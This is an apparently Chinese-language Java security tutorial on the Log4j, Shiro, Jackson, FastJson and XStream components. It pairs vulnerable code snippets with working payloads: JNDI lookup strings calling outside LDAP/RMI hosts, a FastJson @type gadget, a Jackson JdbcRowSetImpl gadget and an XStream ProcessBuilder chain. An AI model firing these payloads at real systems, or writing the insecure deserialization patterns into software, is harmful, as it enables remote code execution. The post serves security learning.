当前位置：首页 > news >正文

JavaSec 基础之五大不安全组件

news 2026/1/16 4:16:07

文章目录

- 不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j
- - Log4j
  - Shiro
  - Jackson
  - FastJson
  - XStream

不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j

Log4j

Apache的一个开源项目，是一个基于Java的日志记录框架。
历史漏洞：https://avd.aliyun.com/search?q=Log4j

import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;public String log4j(String content) {logger.error(content);return "Log4j2 JNDI Injection";}

Log4j2默认支持解析ldap/rmi协议（只要打印的日志中包括ldap/rmi协议即可），并会通过名称从ldap服务端其获取对应的Class文件，并使用ClassLoader在本地加载Ldap服务端返回的Class类。

这就为攻击者提供了攻击途径，攻击者可以在界面传入一个包含恶意内容的ldap协议内容（如：${jndi:ldap://localhost:9999/Test}），

该内容传递到后端被log4j2打印出来，就会触发恶意的Class的加载执行（可执行任意后台指令），从而达到攻击的目的。

payloadxxxx

${jndi:rmi://xxxx:1099/xy9t54}
${jndi:ldap://xxxxx:1389/qerodw}

弹计算器本地才能发现，所以我们检测是否为注入可以 yakit dns 外带。

Shiro

Java安全框架，能够用于身份验证、授权、加密和会话管理。
历史漏洞：https://avd.aliyun.com/search?q=Shiro

登录抓包复制地址

Jackson

当下流行的json解释器，主要负责处理Json的序列化和反序列化。
历史漏洞：https://avd.aliyun.com/search?q=Jackson

Jackson-databind 支持 Polymorphic Deserialization 特性（默认情况下不开启），当 json 字符串转换的 Target class 中有 polymorph fields，即字段类型为接口、抽象类或 Object 类型时，

攻击者可以通过在 json 字符串中指定变量的具体类型 (子类或接口实现类)，来实现实例化指定的类，借助某些特殊的 class，如 TemplatesImpl，可以实现任意代码执行。

ObjectMapper mapper = new ObjectMapper();
mapper.enableDefaultTyping();
Object o = mapper.readValue(content, Object.class);

payload

["com.nqadmin.rowset.JdbcRowSetImpl",{"dataSourceName":"ldap://127.0.0.1:1389/Exploit","autoCommit":"true"}]

把 jndi 部分替换成公网

FastJson

历史漏洞：https://avd.aliyun.com/search?q=fastjson

Fastjson 是阿里巴巴的开源 JSON 解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean

JSONObject jsonToObject = JSON.parseObject(content);
return jsonToObject.get("name").toString();

版本可以从外部导入库查看也可查看 pom.xml 配置文件

payload：

{"@type":"Lcom.sun.rowset.JdbcRowSetImpl;","dataSourceName":"rmi://jndi.fuzz.red:5/ahld/test","autoCommit":true}

XStream

XStream是一个轻量级、简单易用的开源Java类库，它主要用于将对象序列化成XML（JSON）或反序列化为对象。

XStream 在解析XML文本时使用黑名单机制来防御反序列化漏洞，但是其 1.4.16 及之前版本黑名单存在缺陷，攻击者可利用sun.rmi.registry.RegistryImpl_Stub构造RMI请求，进而执行任意命令。

历史漏洞：https://avd.aliyun.com/search?q=XStream

 XStream xs = new XStream();
xs.fromXML(content);

payload

这个倒是没用到 jndi，

<sorted-set><dynamic-proxy><interface>java.lang.Comparable</interface><handler class="java.beans.EventHandler"><target class="java.lang.ProcessBuilder"><command><string>calc</string></command></target><action>start</action></handler></dynamic-proxy></sorted-set>

JavaSec 基础之五大不安全组件

文章目录

不安全组件(框架)-Shiro&FastJson&Jackson&XStream&Log4j

Log4j

Shiro

Jackson

FastJson

XStream

相关文章：

JavaSec 基础之五大不安全组件

python类的属性、方法、静态方法、静态方法类内部的调用、直接调用与实例化调用

haproxy集成国密ssl功能[下]

C++自学精简实践教程

每日一题——LeetCode1572.矩阵对角线元素的和

mysql 常用命令练习

QT6 libModbus 用于ModbusTcp客户端读写服务端

飞桨（PaddlePaddle）Tensor使用教程

数据结构c版（3）——排序算法

《Spring Security 简易速速上手小册》第5章高级认证技术（2024 最新版）

【七】【SQL】自连接

C语言while 与 do...while 的区别？

RK3568平台开发系列讲解（基础篇）内核错误码

点云从入门到精通技术详解100篇-基于点云网络和 PSO 优化算法的手势估计（续）

设计模式（十一）策略模式

Java 计算某年份二月的天数

unity 数学如何计算线和平面的交点

Mysql DATETIME与TIMESTAMP的区别

hadoop基础

2024目前三种有效加速国内Github

web vue 项目 Docker化部署

Vue2 第一节_Vue2上手_插值表达式{{}}_访问数据和修改数据_Vue开发者工具

江苏艾立泰跨国资源接力：废料变黄金的绿色供应链革命

06 Deep learning神经网络编程基础激活函数 --吴恩达

Redis数据倾斜问题解决

均衡后的SNRSINR

Spring Cloud Gateway 中自定义验证码接口返回 404 的排查与解决

Hive 存储格式深度解析：从 TextFile 到 ORC，如何选对数据存储方案？

JAVA后端开发——多租户

中医有效性探讨